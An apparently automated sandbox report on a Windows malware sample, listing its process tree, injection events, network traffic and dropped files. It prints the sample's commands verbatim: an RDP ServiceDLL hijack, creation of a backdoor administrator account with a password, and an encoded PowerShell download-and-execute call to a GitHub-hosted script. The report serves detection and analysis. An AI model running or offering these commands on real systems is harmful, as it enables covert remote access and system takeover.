Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1860 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1860 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2796 wrote to memory of 3428 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 2796 wrote to memory of 3428 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
PID 3428 wrote to memory of 1268 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 3428 wrote to memory of 1268 N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
PID 2796 wrote to memory of 2196 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2796 wrote to memory of 2196 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2796 wrote to memory of 3676 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2796 wrote to memory of 3676 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2796 wrote to memory of 2916 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2796 wrote to memory of 2916 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2796 wrote to memory of 1008 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2796 wrote to memory of 1008 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2796 wrote to memory of 3660 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2796 wrote to memory of 3660 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2796 wrote to memory of 808 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2796 wrote to memory of 808 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2796 wrote to memory of 516 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 2796 wrote to memory of 516 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\net.exe
PID 516 wrote to memory of 3020 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 516 wrote to memory of 3020 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2796 wrote to memory of 1140 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2796 wrote to memory of 1140 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1140 wrote to memory of 3676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1140 wrote to memory of 3676 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 3676 wrote to memory of 584 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 3676 wrote to memory of 584 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 584 wrote to memory of 2920 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 584 wrote to memory of 2920 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2796 wrote to memory of 528 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2796 wrote to memory of 528 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 528 wrote to memory of 1236 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 528 wrote to memory of 1236 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1236 wrote to memory of 1624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1236 wrote to memory of 1624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1624 wrote to memory of 1580 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1624 wrote to memory of 1580 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 648 wrote to memory of 1260 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 648 wrote to memory of 1260 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1260 wrote to memory of 3428 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1260 wrote to memory of 3428 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3356 wrote to memory of 1608 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3356 wrote to memory of 1608 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1608 wrote to memory of 364 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1608 wrote to memory of 364 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2696 wrote to memory of 3920 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2696 wrote to memory of 3920 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3920 wrote to memory of 1496 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3920 wrote to memory of 1496 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1752 wrote to memory of 2912 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 1752 wrote to memory of 2912 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 2912 wrote to memory of 592 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 2912 wrote to memory of 592 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 856 wrote to memory of 3020 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 856 wrote to memory of 3020 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3020 wrote to memory of 3104 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3020 wrote to memory of 3104 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 776 wrote to memory of 3428 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 776 wrote to memory of 3428 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\net.exe
PID 3428 wrote to memory of 3684 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3428 wrote to memory of 3684 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 3344 wrote to memory of 1572 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 3344 wrote to memory of 1572 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe

Processes

C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe

"C:\Users\Admin\AppData\Local\Temp\5367615a3d3f95eeab592a53716ed3bb.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uchmv1dz\uchmv1dz.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC6A1.tmp" "c:\Users\Admin\AppData\Local\Temp\uchmv1dz\CSC5785D5D8B7D445B2AC25F685596F5E5.TMP"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

C:\Windows\system32\net.exe

"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

C:\Windows\system32\cmd.exe

cmd /c net start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr

C:\Windows\system32\net.exe

net start rdpdr

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start rdpdr

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService

C:\Windows\system32\cmd.exe

cmd /c net start TermService

C:\Windows\system32\net.exe

net start TermService

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 start TermService

C:\Windows\System32\cmd.exe

cmd /C net.exe user wgautilacc Ghar4f5 /del

C:\Windows\system32\net.exe

net.exe user wgautilacc Ghar4f5 /del

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del

C:\Windows\System32\cmd.exe

cmd /C net.exe user wgautilacc bbBpaooa /add

C:\Windows\system32\net.exe

net.exe user wgautilacc bbBpaooa /add

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user wgautilacc bbBpaooa /add

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD

C:\Windows\system32\net.exe

net.exe LOCALGROUP "Administrators" wgautilacc /ADD

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD

C:\Windows\System32\cmd.exe

cmd /C net.exe user wgautilacc bbBpaooa

C:\Windows\system32\net.exe

net.exe user wgautilacc bbBpaooa

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 user wgautilacc bbBpaooa

C:\Windows\System32\cmd.exe

cmd.exe /C wmic path win32_VideoController get name

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\System32\cmd.exe

cmd.exe /C wmic CPU get NAME

C:\Windows\System32\Wbem\WMIC.exe

wmic CPU get NAME

C:\Windows\System32\cmd.exe

cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

Network

Country Destination Domain Proto
US 34.104.35.123:80 tcp
FR 2.16.119.157:443 tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 www.speedtest.net udp
US 151.101.2.219:80 www.speedtest.net tcp
US 151.101.2.219:443 www.speedtest.net tcp
US 151.101.2.219:80 www.speedtest.net tcp
US 8.8.8.8:53 c.speedtest.net udp
US 151.101.2.219:443 c.speedtest.net tcp
US 8.8.8.8:53 speedtest.nl-ams.llhost-inc.eu udp
NL 5.101.44.180:8080 speedtest.nl-ams.llhost-inc.eu tcp
US 8.8.8.8:53 speedtest.korton.net udp
NL 91.239.33.168:8080 speedtest.korton.net tcp
US 8.8.8.8:53 speedtest.spl.vodafone.nl udp
NL 62.140.138.205:8080 speedtest.spl.vodafone.nl tcp
US 8.8.8.8:53 speedtest2.usenet.farm udp
NL 178.20.174.136:8080 speedtest2.usenet.farm tcp
US 8.8.8.8:53 asgyyya6ychcha.xyz udp

Files

memory/1860-115-0x000001B0F1690000-0x000001B0F1A8F000-memory.dmp

memory/1860-118-0x000001B0EF133000-0x000001B0EF135000-memory.dmp

memory/1860-117-0x000001B0EF130000-0x000001B0EF132000-memory.dmp

memory/1860-119-0x000001B0EF135000-0x000001B0EF136000-memory.dmp

memory/1860-120-0x000001B0EF136000-0x000001B0EF137000-memory.dmp

memory/2796-121-0x0000000000000000-mapping.dmp

memory/2796-126-0x0000018F46E90000-0x0000018F46E91000-memory.dmp

memory/2796-129-0x0000018F47120000-0x0000018F47121000-memory.dmp

memory/2796-130-0x0000018F2EC20000-0x0000018F2EC22000-memory.dmp

memory/2796-131-0x0000018F2EC23000-0x0000018F2EC25000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ready.ps1

MD5 28d9755addec05c0b24cca50dfe3a92b
SHA1 7d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256 abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512 891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42

memory/2796-137-0x0000018F2EC26000-0x0000018F2EC28000-memory.dmp

memory/3428-138-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\uchmv1dz\uchmv1dz.cmdline

MD5 f5f663312b06688928fa5c1065c74068
SHA1 806bda7c6a1ee7afd9be32bdac946218090a393c
SHA256 2b5706f1f3e1d765a06538a6fb8bd528f2c73830372a29150169ab811b693426
SHA512 74b6f308b4e38555d99f52005f544c3c3091bff059d094c6580bc74118a0141d2a97bed32c18490f29ee7978c997c41dca9776d0dc81e7b9b7b81b7aa5bc7423

\??\c:\Users\Admin\AppData\Local\Temp\uchmv1dz\uchmv1dz.0.cs

MD5 9f8ab7eb0ab21443a2fe06dab341510e
SHA1 2b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256 e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA512 53f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b

memory/1268-141-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\uchmv1dz\CSC5785D5D8B7D445B2AC25F685596F5E5.TMP

MD5 5c6802aa51c67d981edbfe4a22ba642d
SHA1 2710badb1a8e98c55c0ec7b7c70bf5ab24ef4d48
SHA256 802c81d977ce505523be74e70e110a78c2e3e982ef10de9b408c4ca94392cf2a
SHA512 30e73ab309077a71d02914870f2caf18c471cb4e37c6e38ff3b3f36efff7f3b446aad7fb4f9e42f7f77f44fd7044b4583a83fce49274bd7a055b5aad3d93acee

C:\Users\Admin\AppData\Local\Temp\RESC6A1.tmp

MD5 291ce50da4ce041c974d272777bdef2c
SHA1 43b8a2668fad5c3af341765902d958377aafd9b4
SHA256 2f6e5490788d4212665b0edf4b146f5bd9f12de15155299e9e98df4f67b098fd
SHA512 c820783b43f9ebf683c22413337b6d30b20fe84010af4fea915043362a68fb0ff088ee9d228cd022eaf6a79aebd725c3d266864ace7db9e223ad2c3edcf1de34

C:\Users\Admin\AppData\Local\Temp\uchmv1dz\uchmv1dz.dll

MD5 78060fc38dbf6be82d58073d875733dc
SHA1 d6d3a1a46b2d4f98fea9b5d38ce182c832d85714
SHA256 e0d3aa5228409c0390cba8aa47b0447285862b36970919ecb513f86f961e2dc8
SHA512 d80f4e7a5b81f1a18eb50b2f30fbd5bd0ee64b689dad79973c7defea7093616114f4cf5905bdcc986294f3f050976fc52ac6aa052b7c47afbe5ae586e32b9888

memory/2796-145-0x0000018F46EF0000-0x0000018F46EF1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\get-dnsprovider.PS1

MD5 f784c76a5f451d89ecd31dc71a8c26cb
SHA1 81b9f4163f834ea3cf133e2be9b8b81279e41c6b
SHA256 8d77e8f87f57c3cc6c5b19ea782763c6a4c3c18ee750357c050543d913e6ac9f
SHA512 5b8fd465141921c4791739fe5186b615594ae47e16c568fe6a640cb67c21aa25b0e1b5910c3eb56cf3a23ce4c6d251664e132a3007956ed3453dce3d1f713981

memory/2796-152-0x0000018F478D0000-0x0000018F478D1000-memory.dmp

memory/2796-153-0x0000018F47C60000-0x0000018F47C61000-memory.dmp

memory/2796-157-0x0000018F2EC28000-0x0000018F2EC29000-memory.dmp

memory/2196-161-0x0000000000000000-mapping.dmp

memory/2196-170-0x000001C0CAA70000-0x000001C0CAA72000-memory.dmp

memory/2196-171-0x000001C0CAA73000-0x000001C0CAA75000-memory.dmp

memory/2196-190-0x000001C0CAA76000-0x000001C0CAA78000-memory.dmp

memory/3676-200-0x0000000000000000-mapping.dmp

memory/2196-201-0x000001C0CAA78000-0x000001C0CAA7A000-memory.dmp

memory/3676-235-0x000002CA79780000-0x000002CA79782000-memory.dmp

memory/3676-236-0x000002CA79783000-0x000002CA79785000-memory.dmp

memory/3676-237-0x000002CA79786000-0x000002CA79788000-memory.dmp

memory/2916-242-0x0000000000000000-mapping.dmp

memory/3676-255-0x000002CA79788000-0x000002CA7978A000-memory.dmp

memory/2916-256-0x000001AAD0CA0000-0x000001AAD0CA2000-memory.dmp

memory/2916-257-0x000001AAD0CA3000-0x000001AAD0CA5000-memory.dmp

memory/2916-288-0x000001AAD0CA6000-0x000001AAD0CA8000-memory.dmp

memory/2916-289-0x000001AAD0CA8000-0x000001AAD0CAA000-memory.dmp

memory/1008-299-0x0000000000000000-mapping.dmp

memory/3660-300-0x0000000000000000-mapping.dmp

memory/808-301-0x0000000000000000-mapping.dmp

memory/516-338-0x0000000000000000-mapping.dmp

memory/3020-339-0x0000000000000000-mapping.dmp

memory/3676-343-0x0000000000000000-mapping.dmp

memory/1140-342-0x0000000000000000-mapping.dmp

memory/584-344-0x0000000000000000-mapping.dmp

memory/2920-345-0x0000000000000000-mapping.dmp

memory/528-346-0x0000000000000000-mapping.dmp

memory/1236-347-0x0000000000000000-mapping.dmp

memory/1624-348-0x0000000000000000-mapping.dmp

memory/1580-349-0x0000000000000000-mapping.dmp

\Windows\Branding\mediasrv.png

MD5 02de1d05ec7c49607d0469e7731760c6
SHA1 39f0cddc616ab7ccfd0030f9aa257d6603373fb6
SHA256 dcb3e99447dd9c7093c425de2dc13d18342299d6b3876542c8b18542b80ec9eb
SHA512 a33b3da342c96816477347e0dfb6a54b2202990370260aa7fb3de6774c6868a9abef8ec1c794115d927432346153663a600142ca86701adaf1cde2b28f749f82

\Windows\Branding\mediasvc.png

MD5 a82cc23d45b8e1de9897fa40dbfebecb
SHA1 16590d3f0a035e0c01a9959593dd35b5d417a18e
SHA256 300f336a781a00987d35d4db230a14f96d3566ad324d8a5f9b0193095ef3d821
SHA512 b644dc69e2937ce23dd0e49f19bf1541f3e72fc9d1ff1a27d9ec009ad908fc19d8470c11dfe49a305cc9db278d684c31553107f8f4808a157e6c2a3873f5025a

memory/1260-352-0x0000000000000000-mapping.dmp

memory/3428-353-0x0000000000000000-mapping.dmp

memory/1608-354-0x0000000000000000-mapping.dmp

memory/364-355-0x0000000000000000-mapping.dmp

memory/3920-356-0x0000000000000000-mapping.dmp

memory/1496-357-0x0000000000000000-mapping.dmp

memory/2912-358-0x0000000000000000-mapping.dmp

memory/592-359-0x0000000000000000-mapping.dmp

memory/3020-360-0x0000000000000000-mapping.dmp

memory/3104-361-0x0000000000000000-mapping.dmp

memory/3428-362-0x0000000000000000-mapping.dmp

memory/3684-363-0x0000000000000000-mapping.dmp

memory/1572-364-0x0000000000000000-mapping.dmp

memory/3212-365-0x0000000000000000-mapping.dmp

memory/2196-366-0x0000000000000000-mapping.dmp

memory/3660-367-0x0000000000000000-mapping.dmp

memory/3660-375-0x0000023223B13000-0x0000023223B15000-memory.dmp

memory/3660-373-0x0000023223B10000-0x0000023223B12000-memory.dmp

memory/3660-382-0x0000023223B16000-0x0000023223B18000-memory.dmp

memory/3660-428-0x0000023223B18000-0x0000023223B19000-memory.dmp

memory/3212-446-0x0000000000000000-mapping.dmp

memory/1756-447-0x0000000000000000-mapping.dmp